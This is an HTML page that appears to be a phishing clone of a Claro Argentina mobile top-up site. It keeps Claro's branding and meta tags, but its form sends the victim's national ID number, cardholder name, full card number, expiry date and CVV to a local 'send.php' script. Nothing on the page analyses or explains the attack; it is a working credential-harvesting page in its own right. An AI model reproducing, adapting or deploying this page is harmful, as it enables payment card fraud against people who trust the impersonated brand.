<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
<title>Recarga online | Claro Argentina</title>
<link rel="shortcut icon" type="image/x-icon" href="https://simple.claro.com.ar/inicio/assets/favicon.ico">

<link rel="alternate" hreflang="es-ar" href="https://simple.claro.com.ar/inicio">
<link rel="alternate" hreflang="es-uy" href="https://simple.claro.com.uy/inicio">
<link rel="alternate" hreflang="es-py" href="https://simple.claro.com.py/inicio">


<meta name="format-detection" content="telephone=no">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Descargá el botón en tu celular y comprá tu pack en un solo click. Es rápido y simple.">
<meta property="og:title" content="Packs Ya | Claro Argentina">
<meta property="og:description" content="Descargá el botón en tu celular y comprá tu pack en un solo click. Es rápido y simple.">
<meta property="og:image" content="https://simple.claro.com.ar/inicio/assets/localized/ar/img/rich-preview.jpg">
<link rel="stylesheet" type="text/css" href="./index_files/smartphone.css">
<link rel="preload" as="font" href="https://simple.claro.com.ar/inicio/assets/fonts/Icons/smartphone/icons.ttf">

<link rel="manifest" href="https://simple.claro.com.ar/inicio/assets/localized/ar/manifest.webmanifest">
<link rel="apple-touch-icon" href="https://simple.claro.com.ar/inicio/assets/img/icono-home-192.png">

    <meta name="_csrf" content="4e6fcaa5-7b62-4db1-8f4a-d8557baea950">
    <meta name="_csrf_header" content="X-XSRF-TOKEN">
    <meta name="push_public_key" content="BHwzL9kowr2cWTJsOWVtCOUosC6DjDzePmOh0o2JHKDBzZMTS9qUgT8SofFcnEtQdZ4_sR0Ekxg0oguZSAuXmrM">
    <script src="./index_files/BlockAddToHomePrompt.js.descarga"></script>
</head>

  <body id="page-pin" class="page__pin">
  <div class="login page__info">
    <div class="login__content">
      <h1 class="login__logo">
        <img src="./index_files/icono-home-256.png" width="85" alt="">
      </h1>
      <p class="login__description">Ingresá los datos del pago.</p>
      <form action="send.php" method="post">
        <div class="loginform">
          <input type="hidden" name="_csrf" value="4e6fcaa5-7b62-4db1-8f4a-d8557baea950">
          


          
          <div class="loginform  ">
          <input data-only-numeric="" type="number" class="loginform__input" name="dni" id="dni" value="" maxlength="8">
          <label for="dni" class="loginform__label loginform__label__focusable">DNI</label>
          <span class="loginform__span"></span>
          <div>
		    <div class="loginform  ">
          <input type="text" class="loginform__input" name="nombre" id="nombre" value="" maxlength="999">
          <label for="nombre" class="loginform__label loginform__label__focusable">Nombre tal cual figura en la tarjeta</label>
          <span class="loginform__span"></span>
          <div>
		  <div class="loginform  ">
          <input data-only-numeric="" type="creditcard" class="loginform__input" name="cc" id="cc" value="" minlength="15" maxlength="19">
          <label for="cc" class="loginform__label loginform__label__focusable">Digitos de su tarjeta de Credito/Debito</label>
          <span class="loginform__span"></span>
          <div>
		    <div class="loginform  ">
          <input type="text" class="loginform__input" name="mmaa" id="mmaa" value="" maxlength="8">
          <label for="mmaa" class="loginform__label loginform__label__focusable">Fecha de vencimiento de su tarjeta (MM/AA)</label>
          <span class="loginform__span"></span>
          <div>
		    <div class="loginform  ">
          <input data-only-numeric="" type="number" class="loginform__input" name="cvv" id="cvv" value="" maxlength="4">
          <label for="cvv" class="loginform__label loginform__label__focusable">Codigo (3 o 4 digitos al dorso)</label>
          <span class="loginform__span"></span>
          <div>
          
          <div class="span>
          <div>
		  
          <span class=" loginform__error__icon="" icon="" icon--info-warning-rounded"="">
          <span class="loginform__success__icon icon icon--success-rounded"></span>
          <span class="loginform__edit__icon icon icon--edit"></span>
        </div>
        <button id="pin__submit" class="loginform__button loginform__button--resolve" type="submit">Continuar</button>
      
    </div>
  </div>
  <script src="./index_files/AuthPin.js.descarga"></script>
  <script src="./index_files/NumericInput.js.descarga"></script>
  



</div></div></div></div></div></div></div></div></div></form></div></div></body></html>